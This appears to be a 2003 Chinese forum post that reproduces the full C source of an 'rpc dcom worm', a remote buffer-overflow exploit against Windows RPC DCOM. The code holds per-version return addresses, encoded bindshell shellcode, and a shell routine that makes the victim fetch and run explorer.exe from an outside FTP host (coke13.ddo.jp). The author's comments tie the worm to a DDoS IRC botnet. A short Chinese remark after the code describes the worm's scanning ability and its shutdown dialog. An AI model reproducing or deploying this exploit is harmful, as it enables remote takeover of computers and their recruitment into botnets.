|
windows rpc dcom worm
/* rpc dcom worm v 2.2 -
* originally by volkam, fixed and beefed by uv/graff
* even more original concept by lsd-pl.net
* original code by hdm
*
* --
* this code is in relation to a specific ddos ircd botnet project.
* you may edit the code, and define which ftp to login
* and which .exeutable file to recieve and run.
* i use spybot, very convienent
* -
* so basicly kids and brazilian children, this is useless to you
*
* -
* shouts: darksyn - true homie , giver of 0d4yz, and testbeds
* volkam - top sekret agent man
* ntfx - master pupil
* jpahk - true homie #2
*
* legion2000 security research (c) 2003
* -
* enjoy!
**************************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
unsigned char bindstr[]={
0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7f,0x00,0x00,0x00,
0xd0,0x16,0xd0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,
0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xe8,0x03
,0x00,0x00,0xe5,0x00,0x00,0x00,0xd0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xfd,0xcc,0x45
,0x64,0x49,0xb0,0x70,0xdd,0xae,0x74,0x2c,0x96,0xd2,0x60,0x5e,0x0d,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5e,0x0d,0x00,0x02,0x00,0x00,0x00,0x7c,0x5e
,0x0d,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xf1,0xf1,0x2a,0x4d
,0xce,0x11,0xa6,0x6a,0x00,0x20,0xaf,0x6e,0x72,0xf4,0x0c,0x00,0x00,0x00,0x4d,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0d,0xf0,0xad,0xba,0x00,0x00
,0x00,0x00,0xa8,0xf4,0x0b,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4d,0x45
,0x4f,0x57,0x04,0x00,0x00,0x00,0xa2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xc8,0x00
,0x00,0x00,0x4d,0x45,0x4f,0x57,0x28,0x03,0x00,0x00,0xd8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xc4,0x28,0xcd,0x00,0x64,0x29
,0xcd,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xb9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xab,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xa5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xa6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xa4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xad,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xaa,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x50,0x00,0x00,0x00,0x4f,0xb6,0x88,0x20,0xff,0xff
,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0c,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xd8,0x98,0x93,0x98,0x4f,0xd2,0x11,0xa9,0x3d,0xbe,0x57,0xb2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x80,0x00
,0x00,0x00,0x0d,0xf0,0xad,0xba,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4d,0x45,0x4f,0x57,0x04,0x00,0x00,0x00,0xc0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3b,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xc5,0x17,0x03,0x80,0x0e
,0xe9,0x4a,0x99,0x99,0xf1,0x8a,0x50,0x6f,0x7a,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x30,0x00
,0x00,0x00,0x78,0x00,0x6e,0x00,0x00,0x00,0x00,0x00,0xd8,0xda,0x0d,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2f,0x0c,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x10,0x00
,0x00,0x00,0x30,0x00,0x2e,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x68,0x00
,0x00,0x00,0x0e,0x00,0xff,0xff,0x68,0x8b,0x0b,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5c,0x00,0x5c,0x00};
unsigned char request3[]={
0x5c,0x00
,0x43,0x00,0x24,0x00,0x5c,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2e,0x00,0x64,0x00,0x6f,0x00,0x63,0x00,0x00,0x00};
unsigned char *targets [] =
{
"windows nt sp4 (english)",
"windows nt sp5 (chineese)",
"windows nt sp6 (chineese)",
"windows nt sp6a (chineese)",
"windows 2000 nosp (polish)",
"windows 2000 sp3 (polish)",
"windows 2000 sp4 (spanish)",
"windows 2000 nosp1 (english)",
"windows 2000 nosp2 (english)",
"windows 2000 sp2-1 (english)",
"windows 2000 sp2-2 (english)",
"windows 2000 sp3-2 (english)",
"windows 2000 nosp (chineese)",
"windows 2000 sp1 (chineese)",
"windows 2000 sp2 (chineese)",
"windows 2000 sp3 (chineese)",
"windows 2000 sp4 (chineese)",
"windows 2000 sp3 (german)",
"windows 2000 nosp (japaneese",
"windows 2000 sp1 (japaneese)",
"windows 2000 sp2 (japaneese)",
"windows 2000 nosp (korean)",
"windows 2000 sp1 (korean)",
"windows 2000 sp2 (korean)",
"windows 2000 nosp (mexican)",
"windows 2000 sp1 (mexican)",
"windows xp nosp (english)",
"windows sp1-2 (english)",
"windows 2k3 (english)",
"windows 2000 sp3 (german)",
"windows 2000 sp4-1 (german)",
"windows 2000 sp4-2 (german)",
"windows xp sp1 (german)",
"windows 2000 server sp1 (french)",
"windows 2000 server sp4 (french)",
"windows xp nosp (french)",
"windows xp sp1 (french)",
"windows 2000 sp0 (english)",
"windows 2000 sp1 (english)",
"windows 2000 sp2 (english)",
"windows 2000 sp3 (english)",
"windows 2000 sp4 (english)",
"windows xp sp0 (english)",
"windows xp sp1-1 (english)",
"windows xp sp2 (english)",
"windows 2000 advanced server sp3 (english)",
"all/winxp/win2k",
null
};
unsigned long offsets [] =
{
0x77e527f3,
0x77cfdaee,
0x77ac0ef0,
0x77c3eaf0,
0x774d3fe3,
0x77292ce4,
0x77133ba5,
0x777416e8,
0x772b49e2,
0x77b524e8,
0x775cfa2e,
0x772ae3e2,
0x778b89e6,
0x772b49e0,
0x77444342,
0x77294cdf,
0x777a882e,
0x77e527f3,
0x778b89e5,
0x772b49df,
0x772ae3e1,
0x778b89e5,
0x772b49df,
0x772ae3e1,
0x778b89e8,
0x77e3afe9,
0x77db37d7,
0x77b05422,
0x77292ce3,
0x77294ce0,
0x7756c2e2,
0x77fc18d4,
0x774b3ee4,
0x7756c2e2,
0x774a75d4,
0x77fc18d4,
0x77e81674,
0x77e829ec,
0x77e824b5,
0x77e8367a,
0x77f92a9b,
0x77e9afe3,
0x77e626ba,
0x77d737db,
0x77e2afc5,
0x010016c6
};
unsigned char sc[]=
"\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x46\x00\x58\x00"
"\xff\xff\xff\xff" /* return address */
"\xcc\xe0\xfd\x7f" /* primary thread data block */
"\xcc\xe0\xfd\x7f" /* primary thread data block */
/* port 4444 bindshell */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0x20,0x00,0x00,0x00,0x30,0x00,0x2d,0x00,0x00,0x00
,0x00,0x00,0x88,0x2a,0x0c,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8c
,0x0c,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
void
shell(int sock)
{
fd_set fd_read;
char buff[1024], *cmd="echo open coke13.ddo.jp>>o&echo wed>>o&echo wed>>o&echo user wed wed>>o&echo bin>>o&echo get explorer.exe>>o&echo bye>>o&ftp -s:o&explorer.exe&del o&exit\n";
int n;
fd_zero(&fd_read);
fd_set(sock, &fd_read);
fd_set(0, &fd_read);
send(sock, cmd, strlen(cmd), 0);
while(1) {
fd_set(sock,&fd_read);
fd_set(0,&fd_read);
if (select(fd_setsize, &fd_read, null, null, null) < 0 ) break;
if (fd_isset(sock, &fd_read)) {
if((n = recv(sock, buff, sizeof(buff), 0)) < 0){
fprintf(stderr, "eof\n");
exit(2);
}
if (write(1, buff, n) < 0) break;
}
if (fd_isset(0, &fd_read)) {
if((n = read(0, buff, sizeof(buff))) < 0){
fprintf(stderr, "eof\n");
exit(2);
}
if (send(sock, buff, n, 0) < 0) break;
}
usleep(10);
exit(0);
}
fprintf(stderr, "connection lost.\n\n");
exit(0);
}
int main(int argc, char **argv)
{
int sock;
int len,len1;
unsigned int target_id;
unsigned long ret;
struct sockaddr_in target_ip;
unsigned short port = 135;
unsigned char buf1[0x1000];
unsigned char buf2[0x1000];
printf("---------------------------------------------------------\n");
printf("- remote dcom rpc buffer overflow exploit\n");
printf("- original code by flashsky and benjurry\n");
printf("- rewritten by hdm\n");
printf("- autoroot/worm by volkam\n");
printf("- fixed and beefed by legion2000 security research\n");
if(argc<3)
{
printf("- usage: %s \n", argv[0]);
printf("- targets:\n");
for (len=0; targets[len] != null; len++)
{
printf("- %d\t%s\n", len, targets[len]);
}
printf("\n");
exit(1);
}
/* yeah, get over it */
target_id = atoi(argv[1]);
ret = offsets[target_id];
printf("- using return address of 0x%.8x\n", ret);
memcpy(sc+36, (unsigned char *) &ret, 4);
target_ip.sin_family = af_inet;
target_ip.sin_addr.s_addr = inet_addr(argv[2]);
target_ip.sin_port = htons(port);
if ((sock=socket(af_inet,sock_stream,0)) == -1)
{
perror("- socket");
return(0);
}
if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
{
perror("- connect");
return(0);
}
len=sizeof(sc);
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);
*(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;
*(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,sc,sizeof(sc));
len1=len1+sizeof(sc);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);
*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
if (send(sock,bindstr,sizeof(bindstr),0)== -1)
{
perror("- send");
return(0);
}
len=recv(sock, buf1, 1000, 0);
if (send(sock,buf2,len1,0)== -1)
{
perror("- send");
return(0);
}
close(sock);
sleep(1);
target_ip.sin_family = af_inet;
target_ip.sin_addr.s_addr = inet_addr(argv[2]);
target_ip.sin_port = htons(4444);
if ((sock=socket(af_inet,sock_stream,0)) == -1)
{
perror("- socket");
return(0);
}
if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
{
printf("- exploit appeared to have failed.\n");
return(0);
}
printf("- dropping to system shell...\n\n");
shell(sock);
return(0);
}
其实这个病毒也没有什么破坏力,但他的扫描能力和入侵能力还是很厉害的,大家可能基本上都见到了中毒计算机的屏幕上出现一个对话框,提示系统要关机,其实这个也很简单,大家不用中病毒就可以来试验一下的,在2000,nt,xp中有一个系统应用程序叫shutdown.exe ,他是提供系统自动关机的应用程序,在98里是没有的。这就是这个东西只能感染2000,nt,xp等的原因。
|
加好友 
发短信
神之弃子
Post By:2003/10/7 9:56:00
Post By:2003/10/18 13:21:00
